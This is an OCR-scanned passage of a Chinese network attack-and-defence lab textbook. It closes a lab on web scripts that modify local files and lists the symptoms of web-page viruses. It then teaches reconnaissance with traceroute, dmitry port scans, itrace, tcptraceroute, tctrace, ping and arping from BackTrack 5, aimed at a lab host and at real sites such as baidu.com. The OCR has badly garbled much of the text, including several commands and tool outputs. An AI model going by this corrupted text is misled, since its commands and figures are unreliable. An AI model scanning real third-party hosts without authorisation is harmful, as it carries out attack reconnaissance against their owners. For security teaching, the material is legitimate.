步骤 9: 当 “ 修 改 . htm” 运 行 结束 后 , 青 运行 C 盘 中 的 test. htm 文件 ,将 出 现 如 图 4-61 
所 示 的 页 面 ,说 明 修 改 文件 内 容 成 功 。 

请 读者 按照 以 上 “创建 . txt” 和 “修改 . txt” 文件 的 内 容 和 操作 方法 ,通过 编写 "拷贝 . x" 
和 “复制 . txt” 脚 本 文件 ,完成 相关 的 实现 。 其 中 ,“ 拷 贝 . txt” 脚 本 的 功能 是 将 test. htm" 4 
m S si ng p. 4 DR. txt” 脚 本 的 功能 是 将 果 面 上 的 test. htm 文件 删除 。 
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d 修改 文件 内 容 c:\TEST. HIE - Nicrosoft Internet Explorer 
文件 人 F) REE EEV REA ITAM) 


O=- O- aO i-o» 8*8 
E) n: tool ME. hta 
Ò 为 帮助 保护 您 的 实 全 ， 


interr 


帮助 00 


et Explorer 


己 经 限制 此 文件 显示 可 能 访问 您 的 计算 机 的 活动 


- 本 地 磁盘 CO 


4-59 系统 安全 提示 信息 


A 修改 文件 内 容 c:XTEST. HIN - Nicrosoft Internet Explorer 
LFF) $5806) EEV WO) IAM) WR 


Q=: - O- ida0 Pss y; O 2 $ 9,8 


tett 0) E) D: At ools MEE. htm 


O 为 帮助 保护 您 的 安全 ，Internet Explorer 已 经 限制 此 文件 显示 可 能 访问 您 的 计算 机 的 活动 内 容 。 单 击 此 处 查看 选项 


mm A ww ' de. 
jac X 


A ARS Toe, 


悠 确实 要 让 此 文件 运行 活动 内 容 吗 ? 


图 4-60 单 击 “ 是 ”按钮 ,允许 该 文件 在 浏览 器 中 打开 
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7h C:ATEST. ETE - Microsoft Internet Explorer 
文件 位 ) ”编辑 区 ) EEV REU 工具 CI) 9500 


O=: O- 8idO-i-e495 m9 £8 


由 网 页 脚本 的 方式 修改 已 存在 文件 内 容 成 功 This is a test. 


- XA (C) 习 修改 文件 内 


4-61 显示 修改 后 的 test. htm 文件 内 容 


4.6.4 任务 与 思考 


根据 目前 互联 网 上 流行 的 常见 网 页 病毒 的 作用 对 象 及 表现 特征 ,可 以 将 网 络 病 毒 归 纳 
为 以 下 两 大 类 ，。 

1. 通过 Java Script, Applet 和 ActiveX 编辑 的 脚本 程序 修改 IE 浏览 器 

该 类 病毒 的 主要 特征 如 下 。 

(D 修改 默认 主页 。 

(2) 主页 设置 被 屏蔽 锁定 , 且 设 置 选 项 无 效 不 可 改 回 。 

(3) 默认 的 IE 搜索 引擎 被 修改 ,IE 标题 栏 被 添加 非法 信息 。 

(4) OE(Outlook Express) 标 题 栏 被 添加 非法 信息 。 

(5) 鼠标 右键 菜单 被 添加 非法 网 站 广告 链接 ,鼠标 右键 弹出 菜单 功能 被 禁用 失 常 。 

(6) IE 收藏 夹 被 强行 添加 非法 网 站 的 地 址 链接 ,在 IE 工具 栏 非法 添加 按钮 。 

(7) 锁定 地 址 下 拉 沫 单 及 其 添加 文字 信息 。 

(8) IE 菜单 “查看 ?下 的 “ 源 文件 ?被 禁用 。 

2. 通过 Java Script, Applet 和 ActiveX 编辑 的 脚本 程序 修改 用 户 操作 系统 

该 类 病毒 的 主要 特征 如 下 。 

(1) 开机 出 现 对 话 框 。 

(2) 系统 正常 启动 后 ,但 IE 被 锁定 网 址 自动 调用 打开 。 
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(3) 格式 化 便 盘 。 
(4) 非法 读 取 或 盗 取 用 户 文 件 。 


(5) 锁定 禁用 注册 表 , 当 编辑 *. reg 注册 表 文 件 时 显示 乱码 。 


(6) 时 间 前 面 加 广告 。 
CL) 局 动 后 首页 被 再 次 修改 。 
(8) 更 改 “ 我 的 电脑 ”下 的 一 系列 文件 夹 名 称 。 
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“知己 知 彼 , 百 战 不 至? 最 早出 现在 军事 领域 , 意 为 如 果 要 想 打 起 仗 来 不 会 有 危险 ,并 能 
够 在 战斗 中 取胜 ,就 需要 事先 对 敌我 双方 的 详细 情况 进行 全 面 的 了 解 和 分 析 , 得 出 正确 的 结 
论 和 判断 。 攻 击 者 在 确定 了 攻击 对 象 后 ,只 有 在 实施 攻击 前 全 面 掌 握 被 攻击 对 象 的 详细 配 
置信 息 ,才能 从 中 发 现 可 利用 的 安全 漏洞 ,进而 确定 具体 的 攻击 方法 ,并 实施 渗透 攻击 。 本 
章 主 要 针对 Web 服务 器 的 安全 问题 ,通过 对 几 个 典型 的 攻防 实验 操作 ,使 读者 对 Web 服务 
需 的 安全 性 有 一 个 直观 的 认识 。 


5.1 主机 扫描 : 路 由 信息 的 收集 


5.1.1 预备 知识 : 路 由 信息 


路 巾 路径 跟踪 是 实现 网 络 拓扑 探测 的 主要 手段 ,Linux 操作 系统 中 的 traceroute 和 
Windows 环境 中 的 tracert 程序 分 别提 供 了 不 同 平 台 上 的 路 申 路 径 跟 踪 功 能 ,两 者 的 实现 原 
理 相 同 ,都 是 用 TTLCTime To Live, 生 存 时 间 ) 字 段 和 ICMP 错误 消息 来 确定 从 一 个 主机 
到 网 络 上 其 他 主机 的 路 由 ,从 而 确定 IP 数据 包 访 问 目标 IP 所 采取 的 路 径 。 当 对 目标 网 络 
中 的 不 同 主机 进行 相同 的 路 由 跟踪 后 ,攻击 者 就 可 以 综合 这 些 路 径 信息 ,绘制 出 目标 网 络 的 
拓扑 结构 ,并 确定 关键 设备 在 网 络 拓扑 中 的 具体 位 置信 息 。 

路 由 器 (router) 是 一 种 网 络 通信 设备 , 它 工 作 在 网 络 层 , 通 过 将 应 用 层 的 报 文 划 分 成 一 
个 个 分 组 后 独立 地 发 送 到 目的 地 (目的 网 络 ) ,这 个 过 程 称 为 路 由 。 在 网 络 拓扑 组 成 中 ,路 由 
天 就 是 连接 两 个 以 上 网 络 的 互联 设备 。 目 前 ,路 由 需 是 互联 网 中 连接 不 同 局 域 网 .广域网 的 
网 络 互 联 设备 。 路 由 硕 根 据 不 同 的 算法 (路 由 协议 ) 目 动 选择 和 设 定 路 由 ,以 最 佳 路 径 将 原 
网 络 中 的 分 组 逐个 发 送 到 目的 网 络 。 路 由 器 是 互联 网 络 的 枢纽 ,可 以 理解 为 现代 交通 环境 
中 的 “交通 警察 ”。 


5.1.2 实验 目的 和 条 件 


1. 实验 目的 

在 掌握 TCP/IP 体系 结构 ,特别 是 千 握 网 络 层 路 由 协议 和 路 由 需 工 作 原 理 的 基础 上 , 通 
过 学 习 Linux 环境 下 相关 路 由 跟 足 工具 的 使 用 方法 , 擎 握 路 由 的 信息 探测 .信息 收 集 与 分 析 
方法 ,尤其 是 通过 对 几 个 工具 (主要 有 traceroute dmitry \itrace teptraceroute,tctrace) M Hl 
功能 的 对 比分 析 , 可 以 发 现 不 同 工 具 的 应 用 优势 。 

2. 实验 条 件 

根据 具体 应 用 ,为 使 实验 与 实际 应 用 有 机 结合 ,本 实验 使 用 一 台 运 行 Back Track 5 
(BT5) 操 作 系 统 的 计算 机 作为 实验 环境 进行 实验 。 
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5.1.3 实验 过 程 


步骤 1: 正确 登录 BT5 系统 。 如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ,可 输入 
"starta" E WP 

步骤 2. 选择 菜单 栏 上 的 Terminal EM , + F2 ygg d E b, 

步骤 3. traceroute LER fi HJ, A ctf xe N PAE S EEA £T 0] PROB E HJ H b 
主机 ,该 实验 中 假设 该 主机 的 IP 地 址 为 192. 168. 1. 185, un traceroute 工具 追踪 192. 
168. 1. 185 EHL, WR E EUN 7] FE os hu E] 5-1 所 示 的 结果 。 


File Edit View Terminal Help 

rootàbt :-« 

rootgbt : ~# 

root@bt :~# 

root@bt :~# 

root&bt:-£ 

rootàbt : -4 

rootàbt : ~# 

root@bt :~# 

root@bt :~# 

root@bt : ~ 六 

root&bt : ~# 

root@bt :~# 

root@bt:~# traceroute 192.168.1.185 

pe to 92.168»1.185 (122. 168.1.385]., 0 hops, gak, 50 byte-packets 
sinu. cloud. com 4192; 1168 af CJIBN E dn | FEL Ms 1x [15 562ws !x 

ta. P -* | 

rootébt :~# 

root@bt:~# 

rootébt :~# 

root@bt :~# 

root@bt : ~# 

root&bt :~# 


图 5-1 使 用 traceroute 工具 成 功 追 踪 192. 168. 1. 185 主机 后 的 显示 结果 


如 果 使 用 traceroute 工具 追踪 www. baidu. com(61. 135. 169. 125 是 百度 的 IP 地址 ,也 
可 以 直接 使 用 域名 www. baidu. com) ,追踪 成 功 后 将 显示 如 图 5-2 所 示 的 结果 。 


| vix root@bt: ~ 


File Edit View Terminal Help 


root@bt:~# traceroute 61.135.169.125 
traceroute to 61.135.169.125 (61.135.169.125), 38 hops max, 60 byte packets 
bogon (192.168.1.253) 3.720 ms 3.589 ms 3:513-as 
bogon (172.30.7.1) 92.899 ms 392.843 ms * 
113.31.45.193 (113.31.45.193) 16.285 ms 16.232.ms" 17.688'ums 
bogon (172.16.6.9) 12.857 ms 12.793 ms 14:288 ms 
125.39.81.157 (125.39.81.157) 8.870 ms 8.409 ms 125.39.81.45 (125.39$81.45 
8.323 ms 
202.99.66.101 (202.99.66.101) 39.735 ms 9.6% ms 9.564 ms 
219.158.12.133 (219.158.12.133) 14.261ms 14.172 ms 14. Yams5 


124.65.194.14 (124.65.194.14) 11.145 ms 11.882 ms 15.888 ms 


61.148. 153, 226 (61.148.155.226)4, 12.166 ms 10.836 ms 10.697-ms 
202.106.4330 Eu 165,43. 3! 16.885.ms5.'X.* * .. 

rogitébt a% | j a f 

roothibt :学 | à | 

root@bt : ~# 

root@bt : ~# 

root@bt : ~# 

root@bt : ~# 

root@bt : ~# 

root@bt : -4 

root@bt :~# 

root@bt : ~# 


图 5-2 ”使 用 traceroute 工具 成 功 追 踪 www. baidu. com 的 显示 结果 
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如 果 使 用 traceroute 工具 追踪 www. w3school. com ,由 于 该 主机 不 存在 (已 关机 ) ,因此 
将 显示 如 图 5-3 所 示 的 结果 。 实 验 时 ,读者 可 以 用 一 个 不 存在 的 主机 域名 来 代替 本 实验 中 


的 www. w3school. com, 


^ v X root@bt: /pentest/enumeration/Otrace 
File Edit View Terminal Help 


lWrootebt:/pentest/enumeration/Otrace£ traceroute www.w3school.com 
traceroute to www.w3school.com (108.175.169.201), 30 hops max, 60 byte packets 
bogon (192.168.1.253) 8.065 ms 7.965 ms 7-:889-as 


* x* »* 


& 9 X. 


113.31.45.193 (113.31.45.193) 17.618 ms 17.535.ms" 17.452'us 

172.16.6.9 (172.16.6.9) 17.368 ms 17.295 ms" 17.222 ms 

125.39.81.45 (125.39.81.45) 8.877 ms 12.418 ms 12.292 WS 

202.99.66.101 (202.99.66.101) 12.235 ms 202.99.116.141 (202.99.116. 141) 1 


.121 ms 202.99.66.101 (202.99.66.101) 12.845 ms 
219.158.188.5 (219.158.100.5) 11.974 ms 219.158.7.45 (2197158.74453). 13.08 
13.021 ms 


* x 


ko * t SOR * 


图 5-3 ”使 用 traceroute 工具 追踪 www. w3school. com 失败 后 的 显示 结果 


步骤 4: dmitry 工具 的 应 用 。 痛 先 , 进 入 /usr/local/bin 目录 ,找到 dmitry 工具 ; 然后 
[di H^. /dmitry” 命 令 查 看 其 帮助 文档 ; fli A". /dmitry -p 192.168.1.185 -p -bMS AH E 
机 192. 168. 1. 185 ,操作 过 程 和 显示 结果 如 图 5-4 所 示 , 读 者 会 发 现 该 主机 开放 了 SSH 的 
22 端口 。 
^ v X root@bt: /usr/local/bin 


File Edit View Terminal Help 


root@bt: /usr/Local/bin# ./dmitry -p 192.168.1.185 -p -b 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:192.168.1.185 
HostName:linux.cloud.com 


Gathered TCP Port information for 192.168.1.185 


>> SSH-2.8-Op&RSsH 4.3. Go) | Po ulla M 3» mA | AT 


Lu! 


ic. S. 


Portscan Finished: Scanned 150 I 148 ports were in state ‘closeéd 


All scans completed, exiting 
rootébt: /usr/local/bins 
rootébt: /usr/local/bin£ 
root@bt: /usr/local/bin£ 
rootébt:/usr/local/bins J 


图 5-4 使 用 dmitry 工具 扫描 主机 192. 168. 1. 185 的 显示 结果 


如 果 扫 描 www. baidu. com 开放 的 TCP 80 问 口 ,将 会 显示 如 图 5-5 所 示 的 结果 。 
步骤 5. itrace 工具 的 应 用 。itrace 工具 有 traceroute 的 功能 ,不 同 之 处 在 于 itrace 使 用 
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f^ v x root@bt: /usr/local/bin 
File Edit View Terminal Help 


root@bt:/usr/local/bin# ./dmitry -p www.baidu.com -p -b 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:61.135.169.105 
HostName :www.baidu.com 


Gathered TCP Port information for 61.135.169.185 


$ | 
PogtScagsfinislled? Scdlnéd 19g ports, 16 pdf ts werdfin [sfate dosed 


All scans completed, exiting 
rootêbt:/usr/local/bin# 


图 5-5 扫描 www. baidu. com 开放 的 TCP 80 端口 后 的 显示 结果 


ICMP 反射 请 求 。 如 果 防 火 墙 禁止 了 traceroute ,但 允许 ICMP 的 反射 请 求 ,那么 仍然 可 以 


使 用 itrace XE E Jj si V Bp HJ Pt H s 


执行 “. /itrace -i eth0 -d www. baidu. com ”命令 ,可 以 看 到 如 图 5-6 所 示 的 回复 信息 。 


说 明 已 经 进行 了 成 功 退 踊 。 


^ v x root@bt: /pentest/enumeration/irpas 
File Edit View Terminal Help 


rootébt:/pentest/enumeration/irpas* ./itrace -i ethg -d www.baidu.com 
1(1) [192.168.1.253] 
2(all) Timeout 
3(all) Timeout 
4(1) [113.31.45.193] 
5(1) [172.16.6.9] 
[125.39.81.157] 
[202.99.116.9] 
[219.158.12.133] 
[124.65. 194.14] 
[61.148 .155.226] 
[202.106.43.30] 
12(all) Timeout 
13(all) Timeout z | 
14d 461.138. 18o 7284 (rem) 
rootitbt : /pentest/enümeration /iTpas: 
rootébt: /pentest/enumeration/irpas4 
rootébt: /pentest/enumeration/irpas? 
root@bt: /pentest/enumeration/irpass 
root@bt: /pentest/enumeration/irpas* 
root&bt : /pentest/enumeration/irpas? 
rootébt: /pentest/enumeration/irpas£ 
rootébt: /pentest/enumeration/irpas? 
rootébt:/pentest/enumeration/irpas£ |l 


B]5-6 使用. /itrace 工具 成 功 追 踪 到 www. baidu. com 后 的 显示 信息 


it 需要 说 明 的 是 ， 百度 www. baidu. com 主机 前 面 肯 定 是 存在 防 KS Ha 


LAGU 


等 安全 设备 的 。 这 


IT, ADR HERE Hl traceroute 工具 追踪 ,将 会 得 到 如 图 5-7 所 示 的 结果 ,显示 无 法 正常 退 踊 ,元 


分 说 明了 itrace 工具 的 应 用 优势 。 


步骤 6: tcptraceroute 工具 的 应 用 。tcptraceroute 工具 可 以 作为 一 个 传统 的 traceroute 
的 补充 工具 ,通过 向 目标 主机 发 送 TCP SYN 数据 包 来 追踪 路 由 。 如 果 防 火 墙 禁止 了 
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^ v x root@bt: /pentest/enumeration/irpas 
File Edit View Terminal Help 


root@bt: /pentest/enumeration/irpas# traceroute www.baidu.com 

traceroute to www.baidu.com (61.135.169.125), 30 hops max, 68 byte packets 
bogon (192.168.1.253) 3.463 ms 3.365 ms 3:278-as 
bogon (172.300.7.1) 11.152 ms 11.881 ms 12.655 ms 


EM 3 3E 


113.31.45.193 (113.31.45.193) 15.273 ms 16.745.ms" 15.115'uns 
bogon (172.16.6.9) 12.064 ms 11.996 ms 11:924 ms 
125.39.81.157 (125.39.81.157) 7.558 ms 7.790 ms 7.695 mms 
202.99.66.101 (202.99.66.181) 7.616 ms 42.277 ms 42.193 ms 
219.158.12.133 (219.158.12.133) 42.137 ms 42.049 ms 411979 ms 
124.65.194.14 (124.65.194.14) 41.908 ms 41.840 ms 41.754Nms 


61.148.155.226 (61.148.155.226) 41.653 ms 41.582 ms 41.490 ms 


图 5-7 使 用 traceroute 工具 无 法 追踪 到 www. baidu. com 主机 的 信息 


traceroute. (H 仍 然 ftit 特定 TCP mg 口 的 Hi 信 9 Jb A tcpt raceroute [ri] 样 可 J jB Eg 到 | 路 由 o 
1T JF / usr/local/bin.3X $| tcptraceroute 工具 并 执行 ,可 以 看 到 成 功 追 中 后 的 显示 信息 ， 
如 图 5-8 所 示 。 


v x root@bt: /usr/local/bin | 
File Edit View Terminal Help 
rooté&bt:/usr/local/bin& ./tcptraceroute www.w3schoo.com 


.168.1.253 8.262 ms 3.751ms 12.162-ms 
.30.7.1 7.816 ms 598.172 ms 16.355 ms 
.31.45.193 7.385 ms 12.938 ms 7.035 ms 
.16.6.9 9.525 ms 10.273 ms 9.192 ms 
.39.81.45 7.877 ms 4.703 ms 8.119 ms 
.99.66.101 7.681 ms ^16.535 ms 18.811 ms 
.158.20.21 12.863 ms 24.687 ms 26.766 ms 
.158.97,186 11.567 mg 20.022 ms 12.243 ms  , 

158.97,182 14.638,m8 12.388 mál. 11.954 ms |. | . 
4719,258.277749 25426]1 m$4^256.816 ms 256.233 Ws Ie | 
^$jo-Db1- Link. telia.net ip e 341.868^ms * 350.929 ms 

las-bbl-link.telia.net (213.1551135.186) 278.548 ms 271.847"ms /358.351 ms 


dils-bbl-link.telia.net (213.155.134.125) 316.753 ms 326.438 fis 308.966 ms 
giganews-ic-388868-dls-bbl.c.telia.net (62.115.11.166) 418.333 ms 419.534 
417.000 ms 
209-99-48-54.fwd.datafoundry.com (209.99.48.54) 415.588 ms * 416.409 ms 
141.8.224.106 [open] 421.723 ms 428.975 ms 422.122 ms 

root@bt: /usr/local/bin£ 


图 5-8 成 功 追 踪 www. w3schoo. com 主机 后 的 显示 信息 


如 果 使 用 traceroute 追踪 ,将 会 显示 如 图 5-9 所 示 的 结果 ,说明 追 踩 失 败 。 

步骤 7: tctrace 工具 的 应 用 。tctrace 工具 与 itrace 类 似 , 但 tctrace 使 用 TCP SYN 数 
据 包 代替 了 ICMP 反射 包 来 工作 。 切 换 到 tctrace 所 在 的 目录 ,并 运行 “. /tctrace -i eth0 -d 
www. w3schoo. com” 命 令 ,将 会 显示 如 果 5-10 所 示 的 结果 ,说 明 已 经 追踪 成 功 。 
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v x root@bt: /usr/local/bin 
File Edit View Terminal Help 
root&bt:/usr/local/bin4 traceroute www.w3schoo.com 


traceroute to www.w3schoo.com (141.8.224.106), 30 hops max, 60 byte packe 
1 bogon (192.168.1.253) 3.861 ms 3.774 ms 3-:679-as 


E m S 


* x* xX 


2 
3 
4 113.31.45.193 (113.31.45.193) 17.665 ms 19.181.ms" 17.5033 
5 bogon (172.16.6.9) 12.451 ms 12.386 ms 12:264 ms 

6 125.39.81.45 (125.39.81.45) 7.892 ms 7.805 ms 7.679 ms 

7 

0 

8 


202.99.66.101 (202.99.66.101) 7.625 ms 202.99.116.141 (282.99.116.14 
806 ms 202.99.66.101 (202.99.66.101) 7.400 ms 

219.158.20.21 (219.158.20.21) 21.413 ms 219.158.101.197 (219,3158..101 
21.348 ms 219.158.20.21 (219.158.28.21) 21.238 ms 
9 219.158.97,186 (219.158.97.186); 18.446 ms 21.104 gms 219.1587191.54 
8.101.54) 91.842 ms. | d ge A y a 
190,:219,258 977182 i$. $55.97 32/182) 13 W822 ms 13 $97 

8.103. 74]* 91.55 es H 

i * 219.158.27.70 (219.158.27.70) 267.849 ms 219.158.27.74 (2197158.27 
55.551 ms 
12 e G S 
13 Llas-bbl-link.telia.net (213.155.135.186) 322.835 ms 322.748 ms 322 
14 dls-bbl-link.telia.net (213.155.134.125) 350.217 ms * * 


7219 A510 74 


图 5-9 4 traceroute 追踪 www. w3schoo. com 后 显示 的 结果 


^ v X root@bt: /pentest/enumeration/irpas 
File Edit View Terminal Help 


rootébt:/pentest/enumeration/irpas& ./tctrace -i ethg -d www.w3schoo.com 
[192.168.1.253] 
[172.380.7.1] 
Timeout 
[113.31.45.193] 
[172.16.6.9] 
[125.39.81.45] 
[202.99.66.101] 
[219.158.20.21] 
[219.158.97.186] 
[219.158.97.182] 
[219.158.27.74] 
[213.248.71.89] 
[213.1$5.135,.186] 。 
4/213.185.124.225f 
[52.115.31.166] * 
[209.99.48.54] 
[141.8.224.186] (reached; open) 
rootébt: /pentest/enumeration/irpas* 


图 5-10 ”使 用 tctrace 工具 成 功 追 踪 www. w3schoo, com 主机 后 的 显示 信息 


5.1.4 任务 与 思考 


通过 本 实验 ,虽然 读者 已 经 掌握 了 路 由 信息 的 获得 方式 ,但 为 了 能 够 适应 复杂 网 络 环境 
下 的 攻防 要 求 , 还 需要 进一步 对 路 由 硕 的 相关 功能 进行 学 习 。 路 由 天 的 主要 功能 包括 以 下 
几 个 方面 。 

(1) 在 不 同 的 网 络 间 接收 分 组 ,然后 根据 分 组 中 的 “目的 IP? 地 址 来 查询 路 由 表 ,再 通过 
合适 的 接口 将 分 组 转发 出 去 。 

(2) 选择 最 合理 的 路 由 ,引导 通信 。 为 了 实现 这 一 功能 ,路 由 需要 按照 某 种 路 申通 信 协 
议 ( 典 型 协议 有 RIP、OSPF、BGP 等 ) 查 找 路 由 表 。 网 络 中 的 每 个 路 由 需 按 照 这 一 规则 动态 
地 更 新 它 所 保存 的 路 由 表 ,以 便 维护 有 效 的 路 由 信息 。 
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(3) 路 由 需 在 转发 分 组 的 过 程 中 ,为 了 便于 在 网 络 间 传 送 分 组 ,需要 按照 预定 的 规则 把 
大 的 数据 包 ( 应 用 层 的 报 文 ) 分 解 成 适合 在 不 同 网 络 之 间 上 自由 传输 的 小 的 数据 包 , 到 达 目 的 
地 后 再 把 分 解 的 数据 包 重 组 成 原 有 形式 (应 用 层 的 报 文 )。 

(4) 多 协议 的 路 由 需 可 以 连接 使 用 不 同 通信 协议 的 网 络 段 ,作为 不 同 通信 协议 网 络 段 
通信 连接 的 平台 。 

(5) 路 由 需 的 主要 任务 是 把 通信 引导 到 目的 地 网 络 ( 局 域 网 ) ,然后 根据 分 组 中 的 “目的 
IP” 地 址 转发 给 指定 的 主机 。 后 一 个 功能 是 通过 ARP(Address Resolution Protocol. ,网 络 地 
址 解析 协议 ) 完 成 的 。 

(6) 动态 限 速 。 动 态 限 速 路 由 器 能 够 实时 地 计算 每 位 用 户 所 需要 的 带宽 ,精确 分 析 用 
户 上 网 类 型 ,并 合理 分 配 带 宽 。 

(7) 缺乏 源 地 址 认证 。 路 由 器 接 收 到 一 个 分 组 时 ,正常 情况 下 只 会 查看 其 “目的 IP” 地 
址 ,将 以 “目的 IP” 地 址 为 查询 路 由 表 并 转发 分 组 ,但 不 会 对 “ 源 IP” 地 址 进行 认证 。 也 就 是 
说 ,路 由 器 对 于 接收 到 的 分 组 ,只 考虑 到 哪里 去 ,而 不 考虑 从 哪里 来 。 这 一 机 制 为 网 络 安全 
带 来 了 问题 ,许多 针对 网 络 的 攻击 都 是 利用 了 这 一 机 制 , 通 过 设置 虚假 的 “ 源 IP” 地 址 来 欺 
骗 目 的 主机 ,再 利用 一 些 协议 的 工作 机 制 (如 TCP 的 三 次 握手 ) 来 进行 攻击 。 


5.2 EH: 主机 探测 


5.2.1 预备 知识 : 主机 扫描 方法 


主机 扫描 (Host Scan) 是 指 通过 对 目标 网 络 ( 一 般 为 一 个 或 多 个 IP 网 段 ) 中 主机 IP 地 
址 的 扫描 ,以 确定 目标 网 络 中 有 哪些 主机 处 于 运行 状态 。 主 机 扫描 的 实现 ,一 般 是 借助 于 
ICMP、TCP、UDP 等 协议 的 工作 机 制 ,来 探测 并 确定 某 一 主机 当前 的 运行 状态 和 可 被 利用 
的 资源 (如 打开 的 进程 .开放 的 端口 等 ) 。 

1. 基于 ICMP 协议 的 扫描 方法 

ICMP(Internet Control Message Protocol, Internet 控制 报 文 协 议 ) 是 TCP/IP 协议 栈 
的 网 际 层 提供 的 一 个 为 主机 或 路 由 右 报 告 差错 或 异常 情况 的 协议 。PING (Packet Internet 
Groper, 分 组 网 间 探 测 ) 是 ICMP 的 一 个 重要 的 应 用 功能 , 它 是 应 用 层 直 接 调 用 网 际 层 
ICMP 协议 的 一 个 特殊 应 用 ,通过 使 用 ICMP 回 送 请 求 与 回 送 应 答 报 文 来 探测 两 台 主 机 之 
间 网 络 的 连通 性 。 

2. 基于 TCP 协议 的 主机 扫描 方法 

TCP(Transmission Control Protocol ,传输 控制 协议 ) 是 一 种 面 回 连接 的 、 可 徘 的 、 基于 
字 节 流 的 传输 层 通信 协议 。 任 意 两 个 节点 间 每 一 个 TCP 通信 的 建立 ,都 需要 有 连接 建立 、 
数据 传输 和 连接 释放 这 3 个 过 程 ( 即 TCP 三 次 握手 ) ,其 目的 是 让 通信 的 双方 都 知道 彼此 的 
存在 ,并 通过 双方 协商 来 确定 具体 的 通信 参数 (如 缓存 大 小 .连接 表 中 的 项 目 、 最 大 窗口 
值 等 ) 。 

3. 基于 UDP 协议 的 主机 扫描 方法 

UDP(User Datagram Protocol ,用 户 数据 报 协 议 ) 是 一 个 无 连接 (没有 提供 三 次 握手 过 
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程 ) 的 ` 尽 最 大 努力 交付 (不 可 靠 ) 的 ` 面 向 报 文 (保留 了 报 文 的 边界 ) 的 传输 层 通信 协议 。 与 
TCP 相 比 ,UDP 最 大 的 优点 是 占用 资源 少 、 效 率 高 ,最 大 的 缺点 是 不 可 徘 。 


5.2.2 实验 目的 和 条 件 


1. 实验 目的 

主机 探测 是 整个 主机 扫描 过 程 的 重要 组 成 部 分 。 通 过 主机 探测 ,可 以 在 确定 的 范围 (一 
般 为 一 个 或 多 个 IP 地 址 段 ) 发 现 正在 运行 (存活 ) 的 主机 ,为 下 一 步 攻 击 ( 端 口 扫 描 和 操作 系 
统 类 型 确定 ) 疯 定 基 础 。 在 网 络 攻击 过 程 中 ,每 一 个 实现 步骤 之 间 都 是 相互 关联 和 相互 影响 
的 ,前 一 个 环节 的 操作 成 果 是 后 一 个 环节 的 基础 。 主 机 探测 的 主要 目的 是 确定 被 攻击 对 象 ， 
只 要 对 象 的 确定 是 准确 无 误 的 ,那么 后 续 的 工作 开展 才 会 有 价值 和 意义 。 

通过 本 实验 , 谈 者 需要 和 车 握 BT5 环境 下 ping.arping,fping 和 genlist 工具 的 使 用 方法 ， 
以 及 不 同 工 具 的 应 用 特点 和 功能 区 别 。 

2. 实验 条 件 

本 实验 需要 在 网 络 环境 中 进行 。 建 议 实 验 在 一 个 局 域 网 内 部 进行 ,这 样 可 以 通过 实验 
发 现 本 局 域 网 中 有 哪些 主机 处 于 运行 状态 。 例 如 ,一 个 局 域 网 中 有 50 台 主 机 ,为 了 实验 ,可 
以 让 其 中 的 10 台 ( 随 意 确定 ) 运 行 , 其 他 主机 处 于 关闭 状态 。 通 过 本 实验 ,将 实验 结果 与 实 
际 情况 进行 对 比分 析 , 以 验证 实验 结果 的 正确 性 和 可 信人 性 。 

本 实验 中 使 用 的 攻击 主机 仍然 是 运行 BT(BackTrack)5 系统 的 计算 机 。 


5.2.3 实验 过 程 


步骤 1: 正确 登录 BTS 系统 。 如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ,可 输入 
“startx” 命 令 切 换 到 图 形 界面 。 

步骤 2: 选择 菜单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 3: ping 工具 的 应 用 。ping 是 非常 普 名 的 用 来 检查 主机 是 否 在 线 的 工具 , 它 的 工 
作 原 理 基 于 发 送 ICMP ECHO Request 包 到 目标 主机 ,如 果 目 标 主机 在 线 并 且 不 对 ping 请 
求 数据 包 进 行 阻 止 时 ,将 回复 一 个 ICMP ECHO Reply 数据 包 。“ping” 命 令 的 选项 较 多 ,最 
常用 的 有 以 下 几 个 。 

-c count; ECHO Request 包 发 送 数量 。 

-i interface address; 源 地 址 网 络 接口 ,该 参数 可 以 是 IP 地 址 或 网 卡 名 称 。 

-s packet size: 指定 要 发 送 的 数据 字 节 数 , 默 认 值 是 56, 然 后 再 与 8 FAY ICMP 头 数 
据 组 成 64 字 节 的 ICMP 数据 包 。 

在 实验 中 ,如果 要 检查 目标 IP 地 址 192. 168. 1. 108( 该 IP 地 址 为 被 攻击 对 象 的 IP 地 
址 ) , 且 发 送 两 个 大 小 为 1000 字 节 的 包 , 其 命令 为 *#ping -c 2 -s 1000 192. 168. 1. 108”, 如 
图 5-11 所 示 。 

步骤 4: arping 工具 的 应 用 。arping 是 一 个 在 局 域 网 中 利用 ARP(Address Resolution 
Protorcol ,地 址 解析 协议 ) 来 探测 目标 主机 连通 性 的 工具 , 它 在 测试 特定 IP 地 址 在 网 络 中 是 
否 使 用 时 非常 有 用 。 该 命令 只 能 运行 在 本 地 局 域 网 内 ,无 法 跨越 路 由 器 和 网 关 。 在 BT5 的 
终端 窗口 中 ,可 以 输入 “arping ”命令 , 按 Enter 键 ,获取 到 该 命令 的 所 有 选项 及 其 使 用 方法 
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^ v root(bt: ~ 
File Edit View Terminal Help 


root@bt:~# ping -c 2 -s 1000 192.168.1.108 
PING 192.168.1.108 (192.168.1.188) 1888(1828) bytes of data. 
1808 bytes from 192.168.1.1088: icmp seq-1 ttl-64-times9,.513 ms 
1808 bytes from 192.168.1.108: icmp seq-2 ttl-64 time-0.308 Ws 


- 192.168.1.1088 ping statistics --- 
2 packets transmitted, 2 received, 0% packet loss; time 999ms 
rtt min/avg/max/mdev = 0.308/0.410/0.513/0.104 ms 
rootàbt :-4 


图 5-11 ping-c2 -s 1000 192, 168. 1. 108 的 运行 过 程 和 结果 


介绍 。 和 常用 的 选项 为 apring -c。 例 如 ,输入 "“# arping -c 5 192. 168. 1. 108” 命 令 ,其 运行 过 
程 和 结果 如 图 5-12 所 示 ( 可 与 图 5-11 中 ping 命令 的 运行 过 程 和 结果 进行 对 比 )。 


^ v X rootGbt: ~ | 
File Edit View Terminal Help 
root@bt:~# arping 
ARPing 2.809, by Thomas Habets <thomas@habets .pp.se> 
usage: arping [ -8aAbdDeFpqrRuv ] 上 -w «us» ] [--S-«hoesi/ip» | 

[ -T «host/ip ] [ -s «MAC» ] [ -t «MAC» ] [ -segount> ] 

[ -i «interface» ] «host/ip/MAC-|-—-B5 
For complete usage info, use --help or check the manpag?. 
root&bt :~# 
